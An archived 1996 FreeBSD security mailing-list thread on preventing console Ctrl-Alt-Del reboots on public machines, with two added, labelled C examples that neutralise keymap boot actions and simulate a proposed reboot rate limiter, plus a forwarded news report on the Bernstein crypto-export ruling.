"nicely". I may be wrong.

> In a public place I would also disable "reset" and "power" button
>

Yes . . . in general I think allowing people physical access to a machine
is a big risk. Anyone with a screwdriver and five minutes can remove your
hard drive, after all.

> (I've seen so many times how our HPs were rebooted by users)
>
>
> IgoR
> aka StR
>
>

Ben

The views expressed above are not those of the Worker's Compensation
Board of Queensland, Australia.
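Ollivier Robert's answer earlier in this thread was to strip the "boot" entries from the keymap the console loads. The C program below is an added example written for this archive, not code from any poster or from the FreeBSD source tree: it takes keymap text in the column layout of a kbdmap(5) file and rewrites every "boot" action to "nop" (the keymap's no-operation action), leaving comment lines untouched, so an administrator can audit a map or neutralise it before loading it with kbdcontrol(1). The keymap excerpt embedded in it is constructed to look like such a file and is not a verbatim copy of any shipped keymap; the function names are my own.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/*
 * Constructed excerpt in the column layout of a FreeBSD kbdmap(5) file:
 * scan code, eight action columns (base, shift, ctrl, ctrl-shift, alt,
 * alt-shift, alt-ctrl, alt-ctrl-shift) and the lock-state flag.  Not a
 * verbatim copy of any shipped keymap.
 */
static const char sample_keymap[] =
    "# the boot action below reboots the machine; comments are left alone\n"
    "# scan                       cntrl alt    alt   alt   cntrl lock\n"
    "# code  base   shift  cntrl  shift alt    shift cntrl shift state\n"
    "  001   esc    esc    esc    esc    esc    esc    debug  esc     O\n"
    "  083   del    '.'    '.'    '.'    '.'    '.'    boot   boot    N\n"
    "  111   del    del    del    del    del    del    boot   boot    N\n";

/* True when the text at q is a whitespace-delimited "boot" token. */
static int is_boot_token(const char *line, const char *q, const char *lend)
{
    if (lend - q < 4 || memcmp(q, "boot", 4) != 0)
        return 0;
    if (q != line && !isspace((unsigned char)q[-1]))
        return 0;
    return lend - q == 4 || isspace((unsigned char)q[4]);
}

/*
 * Copy keymap text from `in` to `out`, rewriting every "boot" action to
 * "nop" (the kbdmap(5) no-operation action).  Lines whose first non-blank
 * character is '#' are comments and are copied unchanged.  Returns the
 * number of actions rewritten, or -1 if `out` is too small.
 */
static int neutralize_boot_keys(const char *in, char *out, size_t outsz)
{
    size_t o = 0;
    int replaced = 0;
    const char *p = in;

    if (outsz == 0)
        return -1;
    while (*p != '\0') {
        const char *eol = strchr(p, '\n');
        const char *lend = eol ? eol : p + strlen(p);
        const char *s = p;
        const char *q = p;
        int comment;

        while (s < lend && isspace((unsigned char)*s))
            s++;
        comment = (s < lend && *s == '#');

        while (q < lend) {
            if (!comment && is_boot_token(p, q, lend)) {
                if (o + 3 >= outsz)
                    return -1;
                memcpy(out + o, "nop", 3);
                o += 3;
                q += 4;
                replaced++;
            } else {
                if (o + 1 >= outsz)
                    return -1;
                out[o++] = *q++;
            }
        }
        if (eol == NULL)
            break;
        if (o + 1 >= outsz)
            return -1;
        out[o++] = '\n';
        p = eol + 1;
    }
    out[o] = '\0';
    return replaced;
}

/* Count the "boot" actions a map still carries: the check an admin would
 * run over `kbdcontrol -d` output before trusting a console in a public place. */
static int count_boot_actions(const char *in)
{
    static char scratch[8192];
    return neutralize_boot_keys(in, scratch, sizeof scratch);
}

int main(void)
{
    char cleaned[1024];
    int n = neutralize_boot_keys(sample_keymap, cleaned, sizeof cleaned);

    printf("before: %d boot action(s)\n", count_boot_actions(sample_keymap));
    printf("rewrote %d action(s) to nop:\n%s", n, cleaned);
    return n < 0;
}
```

Feeding the program a real map and loading the result with kbdcontrol -l gives the effect Ollivier describes without editing the file by hand; the comment-skipping matters because shipped keymaps document the reboot key in comments that a blind substitution would mangle.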
From owner-freebsd-security Fri Dec 20 07:37:38 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id HAA23791 for security-outgoing; Fri, 20 Dec 1996 07:37:38 -0800 (PST)
Received: from vulcan.mikom.csir.co.za (vulcan.mikom.csir.co.za [146.64.83.97]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id HAA23785 for ; Fri, 20 Dec 1996 07:37:30 -0800 (PST)
Received: (from jtonsing@localhost) by vulcan.mikom.csir.co.za (8.7.5/8.6.12) id RAA18260; Fri, 20 Dec 1996 17:36:34 +0200 (SAT)
From: Johann Tonsing
Message-Id: <199612201536.RAA18260@vulcan.mikom.csir.co.za>
Subject: Re: stopping users from rebooting with ctr-alt-del
To: sean@perky.gothic.net.au (Sean Winn)
Date: Fri, 20 Dec 1996 17:36:34 +0200 (SAT)
Cc: freebsd-security@freebsd.org
In-Reply-To: from "Sean Winn" at Dec 21, 96 01:38:24 am
X-Mailer: ELM [version 2.4 PL24 ME8a]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Sean Winn wrote:
> Just a simple question concerning the use of Ctrl-Alt-Del; would it be
> possible to make the reboot usable only if root was logged into
> the currently visible vty? Not being that cluey on the internals of the
> FreeBSD console, it's more a curiosity question than anything.
> A definitive "yes/no/damned if I know" from those who *are* capable of
> answering would save a relative novice hacker from wasting time :)

Well, I guess it is possible since we have full source of the OS. Whether
it is desirable is another question.

> I can already see a nice simple problem, in that it would only work after
> login...if you need to shutdown because you can't login for some reason
> (exhausted swap space because of a nasty process?), then this makes things
> difficult...but it should help machines in public places around people who
> have too much curiosity.

I'd consider having the kernel prompt for the root password if the console
is marked insecure. This probably means that the MD5 of the root password
will have to be placed in the kernel somewhere during the boot process
while the disk is still accessible. (The user might want to reboot when
the disk is not accessible.) (Keeping the root password in the kernel as
plaintext is not a good idea.)
Regards
JT
-- 
jtonsing@mikom.csir.co.za
PGP public key: ftp://skeleton.mikom.csir.co.za/pub/netsec.pgp/jtonsing.pub
Send anonymous mail to jt-anon@zibbi.mikom.csir.co.za (no reply possible)

From owner-freebsd-security Fri Dec 20 07:47:04 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id HAA24086 for security-outgoing; Fri, 20 Dec 1996 07:47:04 -0800 (PST)
Received: from mail.id.net (mail.id.net [199.125.1.6]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id HAA24081 for ; Fri, 20 Dec 1996 07:47:02 -0800 (PST)
Received: from server.id.net (server.id.net [199.125.0.10]) by mail.id.net (8.7.5/ID-Net) with ESMTP id KAA24465; Fri, 20 Dec 1996 10:48:49 -0500 (EST)
Received: (from rls@localhost) by server.id.net (8.8.2/8.7.3) id KAA05651; Fri, 20 Dec 1996 10:49:04 -0500 (EST)
From: Robert Shady
Message-Id: <199612201549.KAA05651@server.id.net>
Subject: Re: stopping users from rebooting with ctr-alt-del
In-Reply-To: from Snob Art Genre at "Dec 20, 96 07:22:54 am"
To: ben@narcissus.ml.org (Snob Art Genre)
Date: Fri, 20 Dec 1996 10:49:04 -0500 (EST)
Cc: igor@alecto.physics.uiuc.edu, sean@perky.gothic.net.au, freebsd-security@FreeBSD.org
X-Mailer: ELM [version 2.4ME+ PL25 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-security@FreeBSD.org
X-Loop: FreeBSD.org
Precedence: bulk

> > > I can already see a nice simple problem, in that it would only work after
> > > login...if you need to shutdown because you can't login for some reason
> > > (exhausted swap space because of a nasty process?), then this makes things
> > > difficult...but it should help machines in public places around people who
> > > have too much curiosity.
> > >
> >
> > Why would you need to use ctrl-alt-del to reboot the machine?
> > 1. it's not a shutdown (it doesn't resync, anyhow)
>
> I believe this is incorrect.

This is incorrect. Most PC UNIXes trap the Ctrl-Alt-Del keystrokes and
either run the standard "shutdown -r now", or call a sync, flush, and
reboot.

> > 2. if you need to "reboot" it no matter what -
> > use the power switch, or "reset" button if one is present.
> > Maybe I am wrong, but I don't see a big difference [for Unix]
> > between ctrl-alt-del and "reset".
>
> I think ctrl-alt-del syncs buffers and otherwise shuts down the machine
> "nicely". I may be wrong.

Yes, Ctrl-Alt-Del is a much safer way to reboot a PC based UNIX box than
just flipping the power off..

> > In a public place I would also disable "reset" and "power" button
> >
>
> Yes . . . in general I think allowing people physical access to a machine
> is a big risk. Anyone with a screwdriver and five minutes can remove your
> hard drive, after all.

Granted.
-- 
Rob

Innovative Data Services
Serving South-Eastern Michigan
Internet Service Provider / Hardware Sales / Consulting Services
Voice: (810)855-0404 / Fax: (810)855-3268 / Web: http://www.id.net

From owner-freebsd-security Fri Dec 20 08:17:24 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id IAA25309 for security-outgoing; Fri, 20 Dec 1996 08:17:24 -0800 (PST)
Received: from gw-nl1.philips.com (gw-nl1.philips.com [192.68.44.33]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id IAA25297 for ; Fri, 20 Dec 1996 08:17:20 -0800 (PST)
Received: (from nobody@localhost) by gw-nl1.philips.com (8.6.10/8.6.10-0.994n-08Nov95) id RAA07946 for ; Fri, 20 Dec 1996 17:17:17 +0100
Received: from unknown(130.139.36.3) by gw-nl1.philips.com via smap (V1.3+ESMTP) with ESMTP id sma007727; Fri Dec 20 17:16:45 1996
Received: from giga.lss.cp.philips.com (giga.lss.cp.philips.com [130.144.199.31]) by smtprelay.nl.cis.philips.com (8.6.10/8.6.10-1.2.1m-961216) with SMTP id RAA02878 for ; Fri, 20 Dec 1996 17:16:43 +0100
Received: by giga.lss.cp.philips.com (8.8.4/1.63) id RAA07474; Fri, 20 Dec 1996 17:16:43 +0100 (MET)
From: security@giga.lss.cp.philips.com (Walter Belgers for mailing lists)
Message-Id: <199612201616.RAA07474@giga.lss.cp.philips.com>
Subject: Re: stopping users from rebooting with ctr-alt-del
To: freebsd-security@freebsd.org
Date: Fri, 20 Dec 1996 17:16:42 +0100 (MET)
In-Reply-To: from Snob Art Genre at "Dec 20, 96 07:22:54 am"
X-Mailer: ELM [version 2.4ME+ PL19 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Snob Art Genre writes:
> > >
> > Why would you need to use ctrl-alt-del to reboot the machine?
> > 1. it's not a shutdown (it doesn't resync, anyhow)
>
> I believe this is incorrect.

Indeed it nicely syncs disks.

> I think ctrl-alt-del syncs buffers and otherwise shuts down the machine
> "nicely". I may be wrong.

No, you're right.

At a student society I set up a FreeBSD system and we found students
hitting CTRL-ALT-DEL to get Windows (they didn't understand the login:
prompt, sheesh) so we remapped reboot to CTRL-ALT-R. We wanted to keep
the option in case the system was crashed to an extent that logging in
was impossible but CTRL-ALT-R would still work. E.g. when we were still
running 1.1.5.1 and switching virtual consoles when X was shutting down
would nuke the screen.

Walter.
-- 
Ir. W.H.B. Belgers, Internet Security Specialist    phone: +31 40 2782753
Origin IT Syst.Man. /Nederland bv, Bldg VN-513      fax:   +31 40 2784697
P.O. Box 218, 5600 MD Eindhoven, Netherlands        email: W.Belgers@nl.cis.philips.com
http://www.cis.philips.com/home/W.Belgers           http://www.IAEhv.nl/users/gigawalt

From owner-freebsd-security Fri Dec 20 08:31:51 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id IAA26129 for security-outgoing; Fri, 20 Dec 1996 08:31:51 -0800 (PST)
Received: from rocky.mt.sri.com (rocky.mt.sri.com [206.127.76.100]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id IAA26124 for ; Fri, 20 Dec 1996 08:31:48 -0800 (PST)
Received: (from nate@localhost) by rocky.mt.sri.com (8.7.5/8.7.3) id JAA23622; Fri, 20 Dec 1996 09:31:39 -0700 (MST)
Date: Fri, 20 Dec 1996 09:31:39 -0700 (MST)
Message-Id: <199612201631.JAA23622@rocky.mt.sri.com>
From: Nate Williams
To: igor@alecto.physics.uiuc.edu (Igor Roshchin)
Cc: sean@perky.gothic.net.au (Sean Winn), freebsd-security@freebsd.org
Subject: Re: stopping users from rebooting with ctr-alt-del
In-Reply-To: <199612201504.JAA23349@alecto.physics.uiuc.edu>
References: <199612201504.JAA23349@alecto.physics.uiuc.edu>
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

> > I can already see a nice simple problem, in that it would only work after
> > login...if you need to shutdown because you can't login for some reason
> > (exhausted swap space because of a nasty process?), then this makes things
> > difficult...but it should help machines in public places around people who
> > have too much curiosity.
> >
>
> Why would you need to use ctrl-alt-del to reboot the machine?
> 1. it's not a shutdown (it doesn't resync, anyhow)

Huh? If you mean it doesn't write the contents of the disk, then you're
wrong. I added the code so that it does indeed do a clean shutdown.

> 2. if you need to "reboot" it no matter what -
> use the power switch, or "reset" button if one is present.
> Maybe I am wrong, but I don't see a big difference [for Unix]
> between ctrl-alt-del and "reset".

The difference between a clean shutdown and a hard shutdown.
Nate

From owner-freebsd-security Fri Dec 20 08:45:49 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id IAA26598 for security-outgoing; Fri, 20 Dec 1996 08:45:49 -0800 (PST)
Received: from nic.follonett.no (nic.follonett.no [194.198.43.10]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id IAA26590 for ; Fri, 20 Dec 1996 08:45:36 -0800 (PST)
Received: (from uucp@localhost) by nic.follonett.no (8.8.3/8.8.3) with UUCP id RAA21943; Fri, 20 Dec 1996 17:43:51 +0100 (MET)
Received: from oo7 (oo7.dimaga.com [192.0.0.65]) by dimaga.com (8.7.5/8.7.2) with SMTP id RAA28722; Fri, 20 Dec 1996 17:45:14 +0100 (MET)
Message-Id: <3.0.32.19961220174411.009b7e10@dimaga.com>
X-Sender: eivind@dimaga.com
X-Mailer: Windows Eudora Pro Version 3.0 (32)
Date: Fri, 20 Dec 1996 17:44:12 +0100
To: Sean Winn
From: Eivind Eklund
Subject: Re: stopping users from rebooting with ctr-alt-del
Cc: security@freebsd.org
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

At 01:38 AM 12/21/96 +1100, you wrote:
>I can already see a nice simple problem, in that it would only work after
>login...if you need to shutdown because you can't login for some reason
>(exhausted swap space because of a nasty process?), then this makes things
>difficult...but it should help machines in public places around people who
>have too much curiosity.

A simple solution: In secure mode, make CTRL-ALT-DEL sync the disks, alert
the user, and keep synced for a short amount of time (say 5 seconds).
Allow three of these syncs, then set a limit of eg 5 minutes before
somebody can do it again.

This way the administrator can sync and then remove power or hard reset,
but a nobody can't do "prank resets" - you get a maximum of 15s/300s = 5%
non-disk time if somebody is standing there messing with the machine
constantly. (Possibly these constants should be tweaked, but I doubt
somebody will stand there for five minutes just to "lock the disk" again)

Eivind Eklund / perhaps@yes.no / http://maybe.yes.no/perhaps/

From owner-freebsd-security Fri Dec 20 08:57:17 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id IAA27248 for security-outgoing; Fri, 20 Dec 1996 08:57:17 -0800 (PST)
Received: from postoffice.cso.uiuc.edu (postoffice.cso.uiuc.edu [128.174.5.11]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id IAA27240 for ; Fri, 20 Dec 1996 08:57:14 -0800 (PST)
Received: from alecto.physics.uiuc.edu (alecto.physics.uiuc.edu [128.174.83.167]) by postoffice.cso.uiuc.edu (8.6.12/8.6.12) with ESMTP id KAA67506; Fri, 20 Dec 1996 10:56:40 -0600
Received: by alecto.physics.uiuc.edu (940816.SGI.8.6.9/940406.SGI) id KAA26853; Fri, 20 Dec 1996 10:55:22 -0600
From: igor@alecto.physics.uiuc.edu (Igor Roshchin)
Message-Id: <199612201655.KAA26853@alecto.physics.uiuc.edu>
Subject: Re: stopping users from rebooting with ctr-alt-del
To: guido@gvr.win.tue.nl (Guido van Rooij)
Date: Fri, 20 Dec 1996 10:55:21 -0600 (CST)
Cc: ben@narcissus.ml.org, sean@perky.gothic.net.au, freebsd-security@FreeBSD.org
In-Reply-To: <199612201629.RAA21703@gvr.win.tue.nl> from "Guido van Rooij" at Dec 20, 96 05:29:54 pm
X-Mailer: ELM [version 2.4 PL24]
Content-Type: text
Sender: owner-security@FreeBSD.org
X-Loop: FreeBSD.org
Precedence: bulk

>
> Snob Art Genre wrote:
> >
> > I think ctrl-alt-del syncs buffers and otherwise shuts down the machine
> > "nicely". I may be wrong.
> >
>
> You are right. It sends a -INT to init. So it is equivalent to shutdown -r.
>
>
> -Guido
>

/me recognizes my mistake.
Thanks to everybody for being patient. :-)

IgoR
aka StR

From owner-freebsd-security Fri Dec 20 09:03:41 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id JAA27640 for security-outgoing; Fri, 20 Dec 1996 09:03:41 -0800 (PST)
Received: from foobar.gw2kbbs.com (foobar.gw2kbbs.com [205.217.137.150]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id JAA27635 for ; Fri, 20 Dec 1996 09:03:38 -0800 (PST)
Received: from blue ([10.12.5.66]) by foobar.gw2kbbs.com (8.7.5/8.6.11) with SMTP id LAA18794; Fri, 20 Dec 1996 11:03:29 -0600 (CST)
Message-ID: <32BAD160.E46@gw2kbbs.com>
Date: Fri, 20 Dec 1996 11:48:16 -0600
From: Tyson
Reply-To: tysonb@gw2kbbs.com
X-Mailer: Mozilla 2.02E (OS/2; I)
MIME-Version: 1.0
To: Igor Roshchin
CC: freebsd-security@freebsd.org
Subject: Re: stopping users from rebooting with ctr-alt-del
References: <199612201504.JAA23349@alecto.physics.uiuc.edu>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Igor Roshchin wrote:
> In a public place I would also disable "reset" and "power" button
>

This illustrates the need for physical security. Any terminal other than
console and possibly an alternate has no business being able to reboot
the cpu.

So far as security on PC's goes, I would also mention that it is a good
idea to operate on a least privilege mode when thinking security. I go so
far as to pull the screws from the floppy drive, push the floppy further
inside the case, and slap a bay cover on top. Same for CD-ROM's. It's the
out of sight, out of mind principle. The newer ATX cases present some good
possibilities as well, as now you can move/hide the power switch as well
as the reset switch.

Even then I wind up hearing about a luser who tries to get around that. I
usually then point them to the "Simon, BOFH" documents, and ask them if
they'd like that. For some reason, they start behaving themselves. I
wonder why. };-)

From owner-freebsd-security Fri Dec 20 14:01:52 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id OAA11234 for security-outgoing; Fri, 20 Dec 1996 14:01:52 -0800 (PST)
Received: from ns2.harborcom.net (root@ns2.harborcom.net [206.158.4.4]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id OAA11229 for ; Fri, 20 Dec 1996 14:01:50 -0800 (PST)
Received: from swoosh.dunn.org (swoosh.dunn.org [206.158.7.243]) by ns2.harborcom.net (8.8.4/8.8.4) with SMTP id RAA07736 for ; Fri, 20 Dec 1996 17:01:49 -0500 (EST)
Date: Fri, 20 Dec 1996 16:57:27 -0500 ()
From: Bradley Dunn
To: freebsd-security@freebsd.org
Subject: Why doesn't su call skeyaccess()?
Message-ID:
X-X-Sender: bradley@harborcom.net
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

The subject says it all. :)

-BD

From owner-freebsd-security Sat Dec 21 21:47:17 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id VAA20399 for security-outgoing; Sat, 21 Dec 1996 21:47:17 -0800 (PST)
Received: from long.yar.ru (ldv@long.yar.ru [193.233.50.2]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id VAA20394 for ; Sat, 21 Dec 1996 21:46:56 -0800 (PST)
Received: from localhost (ldv@localhost) by long.yar.ru (8.8.2/8.8.2) with SMTP id IAA01002 for ; Sun, 22 Dec 1996 08:46:31 +0300
Date: Sun, 22 Dec 1996 08:46:31 +0300 (MSK)
From: "Dmitri V. Lukyanov"
To: security@freebsd.org
Subject: (fwd) FYI: Crypto Restrictions Unconstitutional - US Court
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Hi,

Is this the end of FreeBSD password encryption problems?
From: Mark Hemment
Date: Fri, 20 Dec 1996 18:50:21 +0000 (GMT)
Subject: FYI: Crypto Restrictions Unconstitutional - US Court

I was forwarded this today.

The ruling does not affect export, but it's interesting that "computer
source code is protected speech for purposes of the First Amendment"!

This is slightly off-topic, although it does relate to Linus's move to
the US and encryption in the Linux kernel.

Regards,
markhe

=============================================================================
SUBJECT: COURT DECLARES CRYPTO RESTRICTIONS UNCONSTITUTIONAL
SOURCE: Newsbytes via First! by Individual, Inc.
DATE: December 19, 1996
INDEX: [15]
-----------------------------------------------------------------------------

WASHINGTON, DC, U.S.A., 1996 DEC 19 (NB) via Individual Inc. -- By Bill
Pietrucha. Cold War export restrictions on cryptography received a major
blow this week when a federal judge ruled that the Arms Export Control
Act is an unconstitutional prior restraint on free speech.

The ruling, hailed by the computer industry and privacy advocates, was a
setback for the Clinton Administration's efforts to build "wiretap-ready"
computers, set-top boxes, telephones, and consumer electronics.

The case focused on Daniel J. Bernstein, a research assistant professor
at the University of Illinois at Chicago, who developed an encryption
algorithm, or set of instructions. Bernstein planned to publish his
encryption algorithm, called Snuffle, in academic journals and on the
Internet.

Snuffle scrambles, or encodes, telephone and computer messages that move
across computer networks and the Internet. The messages can be read by
using Unsnuffle, Bernstein's decryption program.

The federal government, however, told Bernstein he would have to register
as an arms dealer and seek government permission before publication, as
is required by the Arms Export Control Act and the International Traffic
in Arms Regulations.
Bernstein sued the government, claiming the government's requirements
violated his First Amendment right of free speech. Earlier this year, the
government argued that since Bernstein's ideas were expressed, in part,
in computer language, or source code, they were not protected by the
First Amendment.

US District Court Judge Marilyn Hall Patel rejected the government's
argument on April 15 of this year, and held for the first time that
computer source code is protected speech for purposes of the First
Amendment.

On Monday, Judge Patel ruled that the Arms Export Control Act is an
unconstitutional prior restraint on speech, because it requires Bernstein
to submit his ideas about cryptography to the government for review, to
register as an arms dealer, and to apply for and obtain from the
government a license to publish his ideas.

Using the Pentagon Papers case as precedent, Judge Patel ruled that the
government's "interest of national security alone does not justify a
prior restraint." Under the Constitution, she said, Bernstein now is free
to publish his ideas without asking the government's permission first.

Judge Patel also held that the government's required licensing procedure
fails to provide adequate procedural safeguards.

The immediate effect of Judge Patel's decision is that Bernstein now is
free to teach his January 13th cryptography class, and can post his class
materials on the Internet, Mike Godwin, a lawyer for the Electronic
Frontier Foundation, said.

"I'm very pleased," Bernstein said. "Now I won't have to tell my students
to burn their notebooks."

The long-range effects, however, still are cloudy, since Judge Patel's
decision only legally applies to Prof. Bernstein. Other people and
companies are still technically required to follow the export
restrictions when speaking or publishing about cryptography, or when
speaking or publishing cryptographic source code.
The decision, however, sends a strong signal that if the government tried
to enforce these rules against other people, the courts are likely to
strike them down again, Godwin said.

Judge Patel has specifically not decided whether the export controls on
object code, the executable form of computer programs which source code
is automatically translated into, are constitutional. Existing export
controls will continue to apply to runnable software products, such as
Netscape's browser, until another court case challenges that part of the
restrictions.

In a November Executive Order, President Clinton offered limited
administrative exemptions from these restrictions to companies which
agree to undermine the privacy of their customers, Godwin said. "Federal
District Judge Patel's ruling knocks both the carrot and the stick out of
Clinton's hand," he said, "because the restrictions were unconstitutional
in the first place."

Jim Bidzos, president of RSA Data Security, one of the companies most
affected by the government's cryptography policies, said, "this is a
positive sign in the crypto wars, the first rational statement concerning
crypto policy to come out of any part of the government."

"It's nice to see that the executive branch does not get to decide
whether we have the right of free speech," PGP Inc. chairman Philip
Zimmermann said. "It shows that my own common sense interpretation of the
constitution was correct five years ago when I thought it was safe to
publish my own software, PGP. If only US Customs had seen it that way."

Zimmermann was investigated by the government when he wrote and gave away
a program for protecting the privacy of e-mail. His "Pretty Good Privacy"
program is used by human rights activists worldwide to protect their
workers and informants from torture and murder by their own countries'
secret police.
Jerry Berman, executive director of the Center for Democracy and
Technology, a Washington-based Internet advocacy group, hailed the
victory, saying "the Bernstein ruling illustrates that the Administration
continues to embrace an encryption policy that is not only unwise, but
also unconstitutional."

The full text of the lawsuit and other paperwork filed in the case is
available from EFF's online archives at http://www.eff.org on the
Internet.

(19961219/Press Contact: Shari Steele, Electronic Frontier Foundation,
301-375-8856; e-mail ssteele@eff.org
Reported by Newsbytes News Network at http://www.newsbytes.com)

"The Pulse of the Information Age"
Newsbytes News Network http://www.newsbytes.com
24-hour computer, telecom and online news

[12-19-96 at 15:00 EST, Copyright 1996, Newsbytes News Network., File: n1219004.6by]

Copyright (c) 1996 by INDIVIDUAL, Inc. All rights reserved.
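Eivind Eklund's proposal earlier in this digest (on a console in secure mode, let Ctrl-Alt-Del sync the disks and hold them quiet for about five seconds, honour three such presses, then refuse further presses for about five minutes) is a small rate limiter, and writing it out makes the worst-case bound he quotes checkable. The C below is an added example for this archive, not code from Eivind or from the FreeBSD kernel; the constants, the struct and the function names are my own, the simulation of someone leaning on the key is constructed, and the per-mille bound follows his own 15s/300s arithmetic rather than the slightly smaller exact figure.

```c
#include <stdint.h>
#include <stdio.h>

/* Policy constants from Eivind's sketch (he notes they may need tweaking). */
#define CAD_BURST      3    /* presses honoured before the lockout starts */
#define CAD_HOLD_S     5    /* seconds the disks are kept synced per press */
#define CAD_LOCKOUT_S  300  /* seconds during which further presses are ignored */

enum cad_result { CAD_SYNCED, CAD_LOCKED };

struct cad_state {
    unsigned used;       /* presses consumed in the current burst */
    int64_t  lock_until; /* presses before this wall-clock second are ignored */
};

/*
 * Handle one Ctrl-Alt-Del press on a secure-mode console at time `now`
 * (seconds).  Within a burst each press syncs the disks and keeps them
 * quiescent for CAD_HOLD_S; the press that exhausts the burst also arms a
 * CAD_LOCKOUT_S lockout.  The caller does the actual sync and the
 * "alert the user" message when CAD_SYNCED is returned.
 */
static enum cad_result cad_press(struct cad_state *st, int64_t now)
{
    if (now < st->lock_until)
        return CAD_LOCKED;          /* prank press: ignored, disks stay busy */

    st->used++;
    if (st->used >= CAD_BURST) {    /* burst exhausted: start the quiet period */
        st->lock_until = now + CAD_LOCKOUT_S;
        st->used = 0;
    }
    return CAD_SYNCED;
}

static const char *cad_message(enum cad_result r)
{
    return r == CAD_SYNCED
        ? "disks synced; safe to remove power for the next few seconds"
        : "reboot key rate-limited; try again later";
}

/*
 * Upper bound on the share of time the disks can be held idle by someone
 * hammering the key, in per mille, using Eivind's own arithmetic
 * (3 presses x 5 s against a 300 s lockout = 15/300 = 5%).
 */
static int cad_worst_case_idle_permille(void)
{
    return CAD_BURST * CAD_HOLD_S * 1000 / CAD_LOCKOUT_S;
}

/*
 * Constructed scenario: someone presses the key every `period` seconds
 * from `start` up to (not including) `end`.  Returns how many presses
 * were honoured, i.e. how many syncs the policy let through.
 */
static int cad_simulate(int64_t start, int64_t end, int64_t period)
{
    struct cad_state st = { 0, 0 };
    int honoured = 0;
    int64_t t;

    for (t = start; t < end; t += period)
        if (cad_press(&st, t) == CAD_SYNCED)
            honoured++;
    return honoured;
}

int main(void)
{
    struct cad_state st = { 0, 0 };
    int64_t t;

    for (t = 0; t < 6; t++)
        printf("t=%3lld: %s\n", (long long)t, cad_message(cad_press(&st, t)));
    printf("an hour of one press per second yields %d syncs (bound %d permille)\n",
           cad_simulate(0, 3600, 1), cad_worst_case_idle_permille());
    return 0;
}
```

The simulation is the point of the exercise: an hour of continuous pressing gets 36 syncs through, three per 302-second cycle, so the administrator who needs a clean sync before pulling the plug still gets one, while the passer-by cannot keep the disks quiesced for more than the bounded fraction Eivind computed.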